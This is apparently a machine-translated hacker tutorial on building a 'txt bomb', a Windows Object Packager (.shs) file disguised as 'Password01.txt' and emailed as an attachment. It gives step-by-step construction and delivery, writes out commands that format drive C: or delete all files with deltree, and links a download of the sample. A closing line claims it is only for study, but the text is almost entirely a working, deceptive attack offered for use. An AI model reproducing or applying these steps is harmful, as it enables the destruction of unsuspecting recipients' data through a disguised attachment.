Proud txt Bomb (Standard Edition)
A few days ago, I published in Black and white a article called "Birds teach the birds to make a txt bomb" a article, get a lot of enthusiastic Netizen's strong recommendation, little words in this deep gratitude! Due to the haste of time, there are still some problems with the "bomb". After some modification, fix the original bug, in 98 Second Edition and 2000 Server Edition pass the test. And the original bomb was divided into three bombs with different power to execute separately.
Below I will improve the TXT bomb production method to teach you: 1. Create a text file that contains only one space (to reduce the volume of the file), optionally named.
2. Open the {WordPad document} and drag the file into the {WordPad document}. You can also click Insert \ object in the single column of the Write pad document, pop the Insert Object dialog box, select Create from file, and then click the Browse button to select the file you want to insert.
3. Select the icon for the inserted object and select Edit \ package object \ Edit package in the menu bar (Figure 1). In the Pop-up Object Packager dialog box, select Edit \ command line in the menu bar, and then enter the following command: start.exe/m format c:/q/autotest/u, click OK, and the content bar will display the command content.
4. Click the "Insert Icon" button in the Appearance bar to pop up a warning dialog box, confirm it, and select an icon.
5. Select "Edit \ Volume Label" In the menu bar and take a name for this embedded object (replaces the original file name). Click Update on the File menu, and then close this dialog box.
6. Drag and drop the embedded object that you just created onto the desktop. The default name for the file is "fragmented" (the default name "Fragment" under 2000), and now we change it to "Password01.txt". Open an e-mail program to issue "Password01.txt" on your desktop as an attachment, or a document that contains an embedded object (with a malicious command) as an attachment.
7. When the recipient of the message mistakenly takes the "password01.txt.shs" file as "Password01.txt" (as described in the preceding article). SHS "extension is always hidden" when you open it confidently, or open the file, click on the embedded object in the file to trigger a malicious command (pop-up dos run window, execute formatting command). If you replace the above command with the following: start.exe/m deltree/y a:\*.* c:\*.* d:\*.* will delete all files on the other hard drive (the letter is customized according to the actual situation); If replaced by: start.exe/m deltree/y C:\win Dows\system\*.* is to delete all files under the c:\windows\system\ directory. (Everyone can change to other orders, of course)
Really very simple, so a malicious attack program was out, too terrible!
(Remember: Only for study and research, not used to attack others, not in the absence of security preparations for the implementation of the above file, hehe!) )
Original File Download Address: Http://www.aosoao.8u8.com/shs.zip
